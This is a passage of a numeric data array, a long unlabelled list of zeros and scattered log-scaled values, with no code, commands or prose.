0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, \n 2.0794415416798357, 0.0, 0.0, 0.0, 0, 4.477336814478207, 0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 1.0986122886681098, 0, 0.0, 0, 0.0, 3.2188758248682006, 0.0, 0.0, 0.0, \n 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.927253685157205, \n 0.0, 3.58351893845611, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 1.3862943611198906, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.8398715690385097, 0.0,\n 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 3.3322045101752034, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0, 2.8398715690385097, 0.0, 0.0, 0.0, 0.0, 0, 1.6094379124341003, \n 0, 0.0, 0, 0.0, 9.252583848076162, 0, 3.1354942159291497, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 3.9512437185814275, \n 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.70805020110221, 0, 0.0, 2.8398715690385097, 0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 6.462743943876961, 0.0, 0.0, 0.0, 0, 0, 0,\n 0.0, 0.0, 0, 0, 0.0, 1.7412592803704001, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 7.069162183664976, 0.0, 0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, \n 3.8501476017100584, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 2.0794415416798357, \n 1.6094379124341003, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 1.0986122886681098, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0, 0.0, 0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 3.2188758248682006, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.0794415416798357, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 5.0689042022202315, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 2.3978952727983707, \n 0.0, 0.0, 0.0, 10.92572086966456, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.5649493574615367, 0.0, 0.0, 0.0, 0, 0.0, \n 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 4.2626798770413155, 0.0, 0, \n 0.0, 0.0, 0.0, 0, 0.0, 13.17304868542365, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 2.8398715690385097, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 2.302585092994046, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 3.871201010907891, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0, 0.0, 1.6094379124341003, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 4.736198448394496, 0, 0.0, 0.0, 0, 0.0, 0, 0, \n 0, 0.0, 2.1972245773362196, 4.795790545596741, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 2.0794415416798357, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, \n 9.545153519762186, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.6931471805599453, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, \n 2.0794415416798357, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0, 0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 2.4849066497880004, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 1.6094379124341003, 0.0, 1.0986122886681098, 0.0, 0.0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 3.4825185607408002, 1.791759469228055, 0.0, \n 3.044522437723423, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.5649493574615367,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 1.791759469228055, 0.0, 0, 0.0, 0.0, 0, \n 1.9459101490553132, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 1.6094379124341003, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 5.723585101952381, 0.0, 2.833213344056216, 0, 0.0, 0.0, 0, 0.0, 0,\n 0.0, 0.0, 0.0, 0, 0.0, 1.6094379124341003, 0.0, 0.0, 2.0794415416798357,\n 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, \n 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.302585092994046, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 3.8918202981106265, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 5.16396083649347, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 5.567740402508132,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, \n 1.3862943611198906, 1.6094379124341003, 0, 1.791759469228055, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 4.624972813284271, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0, \n 3.4825185607408002, 0, 3.0841946160253872, 4.969640753475787, \n 3.0841946160253872, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 4.624972813284271, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, \n 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 3.713572066704308, 0, 2.0794415416798357, 0.0, 0.0, 0.0, 0.0, 0.0,\n 2.5649493574615367, 0, 0.0, 0.0, 0.0, 1.9459101490553132, 0.0, 0.0, 0, \n 1.3862943611198906, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 3.8918202981106265, 4.06534854782536, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 5.723585101952381, 0.0, 0.0, 0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 1.3862943611198906, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 3.8918202981106265, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 2.0794415416798357, 0.0, 4.518263445217987, 0.0, 0.0, 0.0, 0.0, 0, 0, 0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 